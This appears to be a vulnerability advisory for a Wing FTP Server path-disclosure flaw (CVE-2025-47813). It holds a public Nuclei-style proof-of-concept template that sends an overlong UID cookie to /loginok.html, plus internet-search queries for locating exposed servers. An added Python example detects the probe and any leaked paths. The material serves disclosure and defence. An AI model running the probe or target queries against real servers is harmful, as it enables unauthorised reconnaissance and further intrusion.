CVE-2025-47813: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie

Date: 2025-08-01 | Affected software: Wing FTP Server | PoC: public

Vulnerability description

Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813). The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.

PoC code [public]

id: CVE-2025-47813

info:
  name: Wing FTP Server <= 7.4.3 - Path Disclosure via Overlong UID Cookie
  author: rcesecurity,pdteam
  severity: medium
  description: |
    Wing FTP Server versions prior to 7.4.4 are vulnerable to an authenticated information disclosure vulnerability (CVE-2025-47813).
    The vulnerability occurs due to improper validation of the 'UID' session cookie in the /loginok.html endpoint. Supplying an
    overlong UID value causes the server to respond with an error that includes the full local filesystem path. This can aid in further
    exploitation (e.g., CVE-2025-47812) by revealing the application’s file system layout.
  reference:
    - https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
    - https://www.wftpserver.com
  classification:
    epss-score: 0.00627
    epss-percentile: 0.69346
    cve-id: CVE-2025-47813
    cwe-id: CWE-209
    cvss-score: 5.3
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:NH
  metadata:
    product: wftpserver
    vendor: wing_ftp_server
    verified: false
    shodan-query:
      - http.html_hash:2121146066
      - http.favicon.hash:963565804
      - title:"Wing FTP Server"
      - "Server: Wing FTP Server"
    fofa-query:
      - icon_hash="963565804"
      - title="Wing FTP Server"
    zoomeye-query:
      - app="Wing FTP Server"
  tags: cve,cve2025,wingftp,unauth,exposure

variables:
  longuid: "{{repeat('A', 2048)}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/loginok.html"

    headers:
      Cookie: "UID={{longuid}}"
      Content-Type: application/x-www-form-urlencoded

    body: "username=anonymous&password=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Server Path"
          - "Error"
          - ":\\\\"  # Windows path
          - "/usr/"  # Linux path
        condition: or

      - type: word
        part: header
        words:
          - "Wing FTP Server"

    extractors:
      - type: regex
        part: body
        regex:
          - '([a-zA-Z]:[\\/][^A\r\n]{10,})'
# digest: 4b0a00483046022100fc49853d2f958e90107f7fafe5bfc603387138dbbf0112f4ebc9881e65183168022100b34ad7cd24ad748d18b6ebac948a48f06c0455d2145a9a4cb21d8f14d38633db:922c64590222798bb761d5b6d8e72950
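To turn the template's two signals into detection logic, here is an added Python example (not part of the template or of Wing FTP Server) that flags requests carrying an overlong UID cookie and scans responses with the template's own path extractor regex. The 256-byte cookie threshold and the sample response body are assumptions constructed for this example.

```python
import re

# Regex copied from the template's extractor: a drive letter, a path separator, then at
# least ten characters that are neither a newline nor an uppercase 'A' (the probe pads the
# cookie with 'A's, which presumably keeps an echoed cookie from being captured as a path).
# Note it only covers drive-letter paths; the template's "/usr/" matcher handles Linux.
LEAKED_PATH_RE = re.compile(r'([a-zA-Z]:[\\/][^A\r\n]{10,})')

# Assumed threshold: a legitimate UID session cookie is short, the probe sends 2048 bytes.
UID_LENGTH_LIMIT = 256

# Constructed sample response, shaped like the error the template's matchers look for.
SAMPLE_BODY = ("<html><body>Error: Server Path "
               "C:\\WingFTP\\Data\\session\\uid.dat is invalid\r\n</body></html>")


def parse_cookies(header):
    """Parse a Cookie header into a dict (the last value wins on duplicate names)."""
    cookies = {}
    for part in header.split(';'):
        if '=' in part:
            name, _, value = part.strip().partition('=')
            cookies[name] = value
    return cookies


def is_overlong_uid(cookie_header, limit=UID_LENGTH_LIMIT):
    """True when the request's UID cookie exceeds the limit (the probe's signature)."""
    return len(parse_cookies(cookie_header).get('UID', '')) > limit


def leaked_paths(body):
    """Return filesystem paths found in a response body using the template's regex."""
    return [m.strip() for m in LEAKED_PATH_RE.findall(body)]


def triage(cookie_header, response_body):
    """Classify one request/response pair: was the probe sent, and did a path leak?"""
    probe, paths = is_overlong_uid(cookie_header), leaked_paths(response_body)
    if probe and paths:
        return 'exploited', paths   # probe sent and the server disclosed a path
    if probe:
        return 'attempted', paths   # probe sent, no path in the reply (patched host?)
    if paths:
        return 'leak', paths        # path disclosed without the overlong cookie
    return 'clean', paths


if __name__ == '__main__':
    print(triage('UID=' + 'A' * 2048, SAMPLE_BODY))
```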
